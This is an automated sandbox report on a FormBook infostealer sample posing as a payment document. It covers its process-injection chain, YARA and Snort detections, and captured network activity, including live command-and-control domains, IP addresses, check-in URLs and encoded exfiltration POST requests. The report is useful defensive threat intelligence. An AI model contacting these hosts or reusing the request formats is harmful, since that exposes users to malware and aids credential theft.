Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OUTSTANDING_PAYMENT.exe

Overview

General Information

Sample Name:OUTSTANDING_PAYMENT.exe
Analysis ID:830322
MD5:4832e17c1f6841aee2e1984a429ed946
SHA1:d7ad36c7bee5cb39aa5b77944ced8a716a8af545
SHA256:d0ac15eeb53f64ad6f399ead8724f38344daf243332f03790598c6716a04f162
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • OUTSTANDING_PAYMENT.exe (PID: 4224 cmdline: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe MD5: 4832E17C1F6841AEE2E1984A429ED946)
    • qhcqh.exe (PID: 5156 cmdline: "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z MD5: 41C9E29A7ED3640682A0003BE2DF4D93)
      • qhcqh.exe (PID: 5124 cmdline: C:\Users\user\AppData\Local\Temp\qhcqh.exe MD5: 41C9E29A7ED3640682A0003BE2DF4D93)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • rundll32.exe (PID: 4948 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1836f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.qhcqh.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.qhcqh.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20eb3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcc22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1a0da:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.qhcqh.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19ed8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19974:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19fda:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a152:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc7ed:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18bbf:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fc6a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20c1d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.qhcqh.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.qhcqh.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x200b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbe22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x192da:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.3185.151.30.18149711802031453 03/20/23-09:09:32.876293
          SID:2031453
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3192.64.116.16249717802031449 03/20/23-09:09:54.051496
          SID:2031449
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.35.181.216.14149705802031449 03/20/23-09:09:09.878629
          SID:2031449
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3192.64.116.16249717802031412 03/20/23-09:09:54.051496
          SID:2031412
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.35.181.216.14149705802031453 03/20/23-09:09:09.878629
          SID:2031453
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3192.64.116.16249717802031453 03/20/23-09:09:54.051496
          SID:2031453
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3185.151.30.18149711802031449 03/20/23-09:09:32.876293
          SID:2031449
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.38.8.8.851139532023883 03/20/23-09:09:48.362224
          SID:2023883
          Source Port:51139
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic
          Timestamp:192.168.2.35.181.216.14149705802031412 03/20/23-09:09:09.878629
          SID:2031412
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3185.151.30.18149711802031412 03/20/23-09:09:32.876293
          SID:2031412
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: OUTSTANDING_PAYMENT.exeReversingLabs: Detection: 71%
          Source: OUTSTANDING_PAYMENT.exeVirustotal: Detection: 72%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.fanversewallet.com/0oqq/qt9TW=60_ljPJoqo6d2Avira URL Cloud: Label: malware
          Source: http://www.dirdikyepedia.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA==Avira URL Cloud: Label: malware
          Source: http://www.fanversewallet.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g==Avira URL Cloud: Label: malware
          Source: http://www.gorwly.top/0oqq/qt9TW=60_ljPJoqo6d2Avira URL Cloud: Label: malware
          Source: http://www.allison2patrick.online/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.sexopornoxx.store/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.fanversewallet.com/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.landlotto.ru/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.gorwly.topAvira URL Cloud: Label: malware
          Source: http://www.dirdikyepedia.com/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.themssterofssuepnse.restAvira URL Cloud: Label: malware
          Source: http://www.fanversewallet.comAvira URL Cloud: Label: malware
          Source: http://www.gorwly.top/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.themssterofssuepnse.rest/0oqq/Avira URL Cloud: Label: malware
          Source: http://www.landlotto.ru/0oqq/qt9TW=60_ljPJoqo6d2Avira URL Cloud: Label: malware
          Source: http://www.themssterofssuepnse.rest/0oqq/poIb=tYchV8Avira URL Cloud: Label: malware
          Source: http://www.landlotto.ru/0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2Avira URL Cloud: Label: malware
          Source: http://www.hudsonandbailey.uk/0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2Avira URL Cloud: Label: malware
          Source: http://www.allison2patrick.online/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA==Avira URL Cloud: Label: malware
          Source: http://www.themssterofssuepnse.rest/0oqq/qt9TW=60_ljPJoqo6d2Avira URL Cloud: Label: malware
          Source: http://www.landlotto.ruAvira URL Cloud: Label: malware
          Source: http://www.hudsonandbailey.uk/0oqq/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: dirdikyepedia.comVirustotal: Detection: 8%Perma Link
          Source: allison2patrick.onlineVirustotal: Detection: 5%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeReversingLabs: Detection: 51%
          Machine Learning detection for sample
          Source: OUTSTANDING_PAYMENT.exeJoe Sandbox ML: detected
          Source: 13.2.rundll32.exe.4f53814.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.2.qhcqh.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.qhcqh.exe.980000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 13.2.rundll32.exe.30544f8.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.OUTSTANDING_PAYMENT.exe.28ebe10.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: OUTSTANDING_PAYMENT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: OUTSTANDING_PAYMENT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: qhcqh.exe, 00000001.00000003.259638663.000000001A710000.00000004.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000001.00000003.253388114.000000001A580000.00000004.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.000000000138F000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000003.261286551.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.303638444.00000000048DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004D2F000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.305325246.0000000004A74000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004C10000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: qhcqh.exe, qhcqh.exe, 00000002.00000002.303852536.000000000138F000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000003.261286551.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.303638444.00000000048DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004D2F000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.305325246.0000000004A74000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004C10000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: qhcqh.exe, 00000002.00000002.303774098.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: qhcqh.exe, 00000002.00000002.303774098.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_0040290B FindFirstFileW,

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 109.70.26.37 80
          Source: C:\Windows\explorer.exeNetwork Connect: 88.99.217.197 80
          Source: C:\Windows\explorer.exeDomain query: www.themssterofssuepnse.rest
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.249 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.209.159.142 80
          Source: C:\Windows\explorer.exeDomain query: www.karlscurry.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 192.64.116.162 80
          Source: C:\Windows\explorer.exeDomain query: www.fanversewallet.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.181.216.141 80
          Source: C:\Windows\explorer.exeDomain query: www.allison2patrick.online
          Source: C:\Windows\explorer.exeNetwork Connect: 62.4.21.190 80
          Source: C:\Windows\explorer.exeDomain query: www.virginhairweave.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.ty23vip.com
          Source: C:\Windows\explorer.exeNetwork Connect: 213.171.195.105 80
          Source: C:\Windows\explorer.exeDomain query: www.thelastwill.net
          Source: C:\Windows\explorer.exeDomain query: www.gorwly.top
          Source: C:\Windows\explorer.exeDomain query: www.hudsonandbailey.uk
          Source: C:\Windows\explorer.exeDomain query: www.g2fm.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.landlotto.ru
          Source: C:\Windows\explorer.exeDomain query: www.glb-mobility.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.223 80
          Source: C:\Windows\explorer.exeDomain query: www.ketoibabal.cyou
          Source: C:\Windows\explorer.exeDomain query: www.mynichemarket.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 185.151.30.181 80
          Source: C:\Windows\explorer.exeDomain query: www.brennmansoluciones.com
          Source: C:\Windows\explorer.exeDomain query: www.dirdikyepedia.com
          Source: C:\Windows\explorer.exeNetwork Connect: 203.245.24.47 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.58.118.167 80
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 5.181.216.141:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 5.181.216.141:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 5.181.216.141:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49711 -> 185.151.30.181:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49711 -> 185.151.30.181:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49711 -> 185.151.30.181:80
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:51139 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49717 -> 192.64.116.162:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49717 -> 192.64.116.162:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49717 -> 192.64.116.162:80
          Source: Joe Sandbox ViewASN Name: RU-CENTERRU RU-CENTERRU
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.hudsonandbailey.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA== HTTP/1.1Host: www.dirdikyepedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=mrlIldvmtur7mkt/rPLDu6zCaW7pq/FSfCj+/pKGfo5WkxwIgZbXON4VpSp8r5ryJHF0PKr2dhp3lAxH7D3LGu58YX7EcXy0Ow==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.g2fm.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=bPiAqCboB3xuuR9jBd2d5kx4kdlhaJ3zm41TCptSu6I9zHYblFc2aOuFx07ZodW9tNkBHFGkWniHGpAg445zXTdag0fAcLuZfA== HTTP/1.1Host: www.mynichemarket.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.landlotto.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=rLgLF68UEZ/jOQpbJtvCh1aTqtb77wkxPt9G2kjS7kCRXhXDnB6LHrmjVzEzts5aMFPYOamRADOx5QsnbVGJmi/5P43wAiKcGg== HTTP/1.1Host: www.gorwly.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA== HTTP/1.1Host: www.allison2patrick.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=L0mSdT0ooJoC+WTAff+ZGzvWM+chwjv3Dy0WIeNakQkmi/ixITEkKFHCL0Q8UzGKK5QpSY+AVQ3IyxgaFTuxUTcmK0rro2dEnw==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.glb-mobility.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g== HTTP/1.1Host: www.fanversewallet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=/wt4JY4W3l+DpUlEm50j75nj98dXbWC1Jam/Xyx5jEHfTH+E1ePLpr1g8eshFzfVb4/25r9KS6bvXq1NrjcG6ioEuox+na//qA==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.karlscurry.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.hudsonandbailey.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 109.70.26.37 109.70.26.37
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.virginhairweave.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.virginhairweave.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 62 38 49 58 62 6f 44 7a 28 34 55 62 41 6f 66 54 52 54 68 4e 72 58 6f 32 6d 65 67 76 6b 74 6b 6b 47 6d 49 32 36 6f 53 63 34 4c 33 5f 47 39 37 75 4c 6e 31 75 35 4c 50 6b 56 61 62 6e 31 72 48 72 36 47 50 35 76 63 49 32 71 5f 4f 41 68 4c 38 32 4f 6d 68 37 63 36 55 36 76 52 4e 62 4f 69 5a 30 71 55 62 48 62 69 39 76 75 58 55 32 4e 61 74 75 68 4d 61 4c 73 45 49 72 47 32 79 32 4e 73 74 52 64 75 68 53 73 38 63 52 77 41 31 48 4a 66 46 45 72 78 34 4a 4e 49 69 53 6f 36 52 37 52 4d 63 70 43 72 30 31 30 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ICHyvj5=jRIopuIKm5m4b8IXboDz(4UbAofTRThNrXo2megvktkkGmI26oSc4L3_G97uLn1u5LPkVabn1rHr6GP5vcI2q_OAhL82Omh7c6U6vRNbOiZ0qUbHbi9vuXU2NatuhMaLsEIrG2y2NstRduhSs8cRwA1HJfFErx4JNIiSo6R7RMcpCr010w).
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeContent-Length: 5337Cache-Control: no-cacheOrigin: http://www.virginhairweave.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.virginhairweave.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 42 66 51 58 64 4a 44 7a 71 49 55 59 63 59 66 54 44 54 68 52 72 58 6b 32 6d 66 6c 69 6c 62 45 6b 47 31 41 32 39 4b 36 63 72 62 33 5f 4f 64 37 71 55 33 31 43 35 4c 4c 65 56 65 54 6f 31 70 72 72 38 55 33 35 6f 38 49 31 6a 5f 4f 46 6b 4c 38 33 57 47 68 37 63 39 63 4d 76 51 4e 4c 4f 6a 68 30 71 6d 28 48 62 6b 4a 75 6f 48 55 33 50 61 74 75 68 4d 57 55 73 45 49 56 47 32 72 74 4e 73 4e 52 63 34 46 53 75 74 63 53 33 51 30 50 41 5f 45 7a 36 53 70 67 4c 5f 79 65 37 36 5a 48 48 71 67 33 4a 6f 4e 6b 68 66 43 72 73 6a 7a 71 51 30 30 35 63 42 62 34 53 4b 79 67 68 6c 43 5a 65 6b 45 48 68 70 61 4a 6e 64 51 30 6b 59 50 6e 6f 53 38 47 34 65 70 4e 35 